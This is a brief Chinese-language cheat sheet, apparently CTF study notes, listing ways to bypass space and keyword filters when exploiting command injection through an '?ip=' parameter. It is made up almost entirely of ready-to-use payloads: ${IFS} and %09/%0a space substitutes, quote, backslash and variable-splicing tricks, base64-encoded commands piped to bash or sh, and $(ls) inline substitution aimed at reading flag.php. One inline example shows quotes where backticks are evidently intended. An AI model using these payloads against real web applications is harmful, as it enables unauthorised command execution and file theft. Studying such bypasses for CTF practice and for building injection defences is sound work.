考察知识点:
文件执行漏洞
空格特殊字符、flag字符绕过
空格绕过
${IFS}
${IFS}$1
$IFS$1
<和<>
{cat,flag}
%20替换
%0a (换行)
%0d (回车)
%09 (tab
黑名单(关键字)绕过
单引号、双引号绕过:c"at"t fl''ag
反斜线绕过:ca\t fl\ag
num和@绕过:c$1at fl$@ag
拼接绕过:a=c;b=at;c=fl;d=ag; $a$b $c$d (不用加|)
/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
/?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php
base64:
echo "Y2F0IGZsYWc="|base64 -d
echo "Y2F0IGZsYWc="|base64 -d|bash
|echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
内联绕过
所谓内联绕过就是将反引号内命令的输出作为输入执行,比如系统对flag字符进行了过滤,那么我们可以通过ls命令将flag.php输出作为输入,有以下两种方式:
?ip=127.0.0.1;cat 'ls'
?ip=127.0.0.1;cat $(ls)